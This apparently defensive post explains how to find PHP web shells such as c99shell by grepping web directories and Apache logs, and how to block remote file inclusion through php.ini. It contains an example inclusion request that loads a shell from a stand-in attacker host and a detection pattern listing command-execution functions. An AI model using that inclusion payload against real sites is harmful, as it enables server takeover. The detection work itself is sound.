detecting php backdoors



c99shell.php
r57shell.php
php_shell.php
myshell.php
php_backdoor.php

These are the common PHP backdoors being used today by script kiddies, and detecting them is simple. First go to your web directory (ex. /var/www/web/), because PHP backdoors are placed in the web directory so that the script kiddie can later use them to access your system remotely. In the console just type this:

root@server /var/www:~# grep -n -r 'system(' *

Most backdoors use the system() function to execute a command, so this search finds them.

But if your whole system is already rooted, the "grep" command is useless, because it has already been replaced by another "grep" binary that comes with the rootkit.

View the example below:

[example: c99shell.php]

Editor's Note:
Remember, it's not necessary for the file to actually be on your server, just that your server runs the file. Many kiddies will try to use your existing website to load their PHP shell script. For example, when you see a website that uses "domain.com?page=home" (where domain.com is your website on your server), many kiddies will try to load "domain.com?page=http:hackersite.php/c99shell.php" to get your server to load their PHP shell remotely. Other than good coding (don't accept blind input, clean and scrub all user input, select from switch statements, etc.), you can (and always should) set this line in your php.ini file:

; Whether to allow the treatment of URLs (like http:// or ftp://) as files.
allow_url_fopen = Off

If you turn that Off, it prevents them from loading remote files. Unfortunately that setting defaults to On in most Linux distros. Also, just as reans shows you how to grep your web dirs, you can use that to grep your Apache log files.
-alex
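The two checks above (the grep for system() in the web directory, and the editor's suggestion to grep the Apache log for remote-file requests) put together as one script. This is an added example, not code from the original post or its editor; the web-root path, the sample PHP files, the log lines and the domain attacker.example are all constructed for the demo.

```shell
#!/bin/sh
# Added example, not code from the original post. It automates the two checks
# the page describes: grep the web directory for the command-execution calls
# PHP backdoors rely on (system() and its siblings), and grep the Apache
# access log for remote-file-inclusion attempts of the ?page=http://... kind.
# All sample files and log lines below are constructed for the demo.

# Functions commonly abused by PHP shells, matched only as calls ("name(").
# Extended regex so it works with any POSIX grep, not just GNU grep.
SUSPICIOUS='(system|exec|shell_exec|passthru|popen|proc_open|eval)[[:space:]]*\('

# Print "file:line:text" for each suspicious call in the .php files under $1.
# /dev/null is passed so grep always prefixes the file name, even for one file.
scan_php_dir() {
    find "$1" -type f -name '*.php' -exec grep -nE "$SUSPICIOUS" /dev/null {} +
}

# Print access-log lines where a query parameter carries a remote URL,
# plain (http://) or percent-encoded (http%3A%2F%2F).
scan_access_log() {
    grep -iE '[?&][a-z0-9_]+=(https?|ftp)(://|%3a%2f%2f)' "$1"
}

# Create a throwaway web root and log with constructed content; print its path.
make_samples() {
    d=$(mktemp -d)
    mkdir -p "$d/web/inc"
    printf '<?php // system status page\necho "hello";\n' > "$d/web/index.php"
    printf '<?php $c = "x";\n system($c); // constructed backdoor-style call\n' \
      > "$d/web/inc/c99shell.php"
    printf '%s\n' \
      '10.0.0.5 - - [01/Jan/2024:00:00:00 +0000] "GET /index.php?page=home HTTP/1.1" 200 512' \
      '10.0.0.9 - - [01/Jan/2024:00:00:01 +0000] "GET /index.php?page=http://attacker.example/c99shell.php HTTP/1.1" 200 4096' \
      > "$d/access.log"
    echo "$d"
}

# Caveat from the post: on a rooted host the grep binary itself may be a
# rootkit replacement, so run these checks with tools from a known-good
# medium (live CD, static binaries) or after verifying the binary's hash
# against the distribution package.

if [ "${1:-}" = "--demo" ]; then
    D=$(make_samples)
    echo "== suspicious calls under $D/web"; scan_php_dir "$D/web"
    echo "== remote-URL requests in $D/access.log"; scan_access_log "$D/access.log"
    rm -rf "$D"
fi
```

Run it with `--demo` to see both scans over the constructed samples; in real use point scan_php_dir at your web root and scan_access_log at the Apache access log.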